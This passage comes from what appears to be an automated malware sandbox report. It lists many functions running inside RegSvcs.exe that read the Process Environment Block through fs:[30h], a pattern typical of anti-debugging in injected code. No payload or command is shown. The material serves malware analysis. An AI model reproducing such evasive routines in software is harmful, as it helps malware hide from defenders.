            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A4000 mov ecx, dword ptr fs:[00000030h]9_2_016A4000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C2000 mov eax, dword ptr fs:[00000030h]9_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E016 mov eax, dword ptr fs:[00000030h]9_2_0163E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E016 mov eax, dword ptr fs:[00000030h]9_2_0163E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E016 mov eax, dword ptr fs:[00000030h]9_2_0163E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E016 mov eax, dword ptr fs:[00000030h]9_2_0163E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0161A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A60E0 mov eax, dword ptr fs:[00000030h]9_2_016A60E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016280E9 mov eax, dword ptr fs:[00000030h]9_2_016280E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C0F0 mov eax, dword ptr fs:[00000030h]9_2_0161C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016620F0 mov ecx, dword ptr fs:[00000030h]9_2_016620F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A20DE mov eax, dword ptr fs:[00000030h]9_2_016A20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016180A0 mov eax, dword ptr fs:[00000030h]9_2_016180A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B80A8 mov eax, dword ptr fs:[00000030h]9_2_016B80A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E60B8 mov eax, dword ptr fs:[00000030h]9_2_016E60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E60B8 mov ecx, dword ptr fs:[00000030h]9_2_016E60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162208A mov eax, dword ptr fs:[00000030h]9_2_0162208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C437C mov eax, dword ptr fs:[00000030h]9_2_016C437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F634F mov eax, dword ptr fs:[00000030h]9_2_016F634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A2349 mov eax, dword ptr fs:[00000030h]9_2_016A2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov eax, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov eax, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov eax, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov ecx, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov eax, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A035C mov eax, dword ptr fs:[00000030h]9_2_016A035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EA352 mov eax, dword ptr fs:[00000030h]9_2_016EA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C8350 mov ecx, dword ptr fs:[00000030h]9_2_016C8350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F8324 mov eax, dword ptr fs:[00000030h]9_2_016F8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F8324 mov ecx, dword ptr fs:[00000030h]9_2_016F8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F8324 mov eax, dword ptr fs:[00000030h]9_2_016F8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F8324 mov eax, dword ptr fs:[00000030h]9_2_016F8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A30B mov eax, dword ptr fs:[00000030h]9_2_0165A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A30B mov eax, dword ptr fs:[00000030h]9_2_0165A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A30B mov eax, dword ptr fs:[00000030h]9_2_0165A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161C310 mov ecx, dword ptr fs:[00000030h]9_2_0161C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01640310 mov ecx, dword ptr fs:[00000030h]9_2_01640310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016303E9 mov eax, dword ptr fs:[00000030h]9_2_016303E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E3F0 mov eax, dword ptr fs:[00000030h]9_2_0163E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E3F0 mov eax, dword ptr fs:[00000030h]9_2_0163E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E3F0 mov eax, dword ptr fs:[00000030h]9_2_0163E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016563FF mov eax, dword ptr fs:[00000030h]9_2_016563FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DC3CD mov eax, dword ptr fs:[00000030h]9_2_016DC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A3C0 mov eax, dword ptr fs:[00000030h]9_2_0162A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016283C0 mov eax, dword ptr fs:[00000030h]9_2_016283C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016283C0 mov eax, dword ptr fs:[00000030h]9_2_016283C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016283C0 mov eax, dword ptr fs:[00000030h]9_2_016283C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016283C0 mov eax, dword ptr fs:[00000030h]9_2_016283C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A63C0 mov eax, dword ptr fs:[00000030h]9_2_016A63C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE3DB mov eax, dword ptr fs:[00000030h]9_2_016CE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE3DB mov eax, dword ptr fs:[00000030h]9_2_016CE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE3DB mov ecx, dword ptr fs:[00000030h]9_2_016CE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CE3DB mov eax, dword ptr fs:[00000030h]9_2_016CE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C43D4 mov eax, dword ptr fs:[00000030h]9_2_016C43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C43D4 mov eax, dword ptr fs:[00000030h]9_2_016C43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E388 mov eax, dword ptr fs:[00000030h]9_2_0161E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E388 mov eax, dword ptr fs:[00000030h]9_2_0161E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161E388 mov eax, dword ptr fs:[00000030h]9_2_0161E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164438F mov eax, dword ptr fs:[00000030h]9_2_0164438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164438F mov eax, dword ptr fs:[00000030h]9_2_0164438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618397 mov eax, dword ptr fs:[00000030h]9_2_01618397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618397 mov eax, dword ptr fs:[00000030h]9_2_01618397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618397 mov eax, dword ptr fs:[00000030h]9_2_01618397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624260 mov eax, dword ptr fs:[00000030h]9_2_01624260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624260 mov eax, dword ptr fs:[00000030h]9_2_01624260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624260 mov eax, dword ptr fs:[00000030h]9_2_01624260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161826B mov eax, dword ptr fs:[00000030h]9_2_0161826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0274 mov eax, dword ptr fs:[00000030h]9_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A8243 mov eax, dword ptr fs:[00000030h]9_2_016A8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A8243 mov ecx, dword ptr fs:[00000030h]9_2_016A8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161A250 mov eax, dword ptr fs:[00000030h]9_2_0161A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F625D mov eax, dword ptr fs:[00000030h]9_2_016F625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626259 mov eax, dword ptr fs:[00000030h]9_2_01626259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA250 mov eax, dword ptr fs:[00000030h]9_2_016DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA250 mov eax, dword ptr fs:[00000030h]9_2_016DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161823B mov eax, dword ptr fs:[00000030h]9_2_0161823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016302E1 mov eax, dword ptr fs:[00000030h]9_2_016302E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016302E1 mov eax, dword ptr fs:[00000030h]9_2_016302E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016302E1 mov eax, dword ptr fs:[00000030h]9_2_016302E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A2C3 mov eax, dword ptr fs:[00000030h]9_2_0162A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A2C3 mov eax, dword ptr fs:[00000030h]9_2_0162A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A2C3 mov eax, dword ptr fs:[00000030h]9_2_0162A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A2C3 mov eax, dword ptr fs:[00000030h]9_2_0162A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A2C3 mov eax, dword ptr fs:[00000030h]9_2_0162A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F62D6 mov eax, dword ptr fs:[00000030h]9_2_016F62D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016302A0 mov eax, dword ptr fs:[00000030h]9_2_016302A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016302A0 mov eax, dword ptr fs:[00000030h]9_2_016302A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov eax, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov ecx, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov eax, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov eax, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov eax, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B62A0 mov eax, dword ptr fs:[00000030h]9_2_016B62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E284 mov eax, dword ptr fs:[00000030h]9_2_0165E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E284 mov eax, dword ptr fs:[00000030h]9_2_0165E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A0283 mov eax, dword ptr fs:[00000030h]9_2_016A0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A0283 mov eax, dword ptr fs:[00000030h]9_2_016A0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A0283 mov eax, dword ptr fs:[00000030h]9_2_016A0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165656A mov eax, dword ptr fs:[00000030h]9_2_0165656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165656A mov eax, dword ptr fs:[00000030h]9_2_0165656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165656A mov eax, dword ptr fs:[00000030h]9_2_0165656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628550 mov eax, dword ptr fs:[00000030h]9_2_01628550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628550 mov eax, dword ptr fs:[00000030h]9_2_01628550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630535 mov eax, dword ptr fs:[00000030h]9_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E53E mov eax, dword ptr fs:[00000030h]9_2_0164E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E53E mov eax, dword ptr fs:[00000030h]9_2_0164E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E53E mov eax, dword ptr fs:[00000030h]9_2_0164E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E53E mov eax, dword ptr fs:[00000030h]9_2_0164E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E53E mov eax, dword ptr fs:[00000030h]9_2_0164E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6500 mov eax, dword ptr fs:[00000030h]9_2_016B6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4500 mov eax, dword ptr fs:[00000030h]9_2_016F4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016225E0 mov eax, dword ptr fs:[00000030h]9_2_016225E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E5E7 mov eax, dword ptr fs:[00000030h]9_2_0164E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C5ED mov eax, dword ptr fs:[00000030h]9_2_0165C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C5ED mov eax, dword ptr fs:[00000030h]9_2_0165C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E5CF mov eax, dword ptr fs:[00000030h]9_2_0165E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E5CF mov eax, dword ptr fs:[00000030h]9_2_0165E5CF
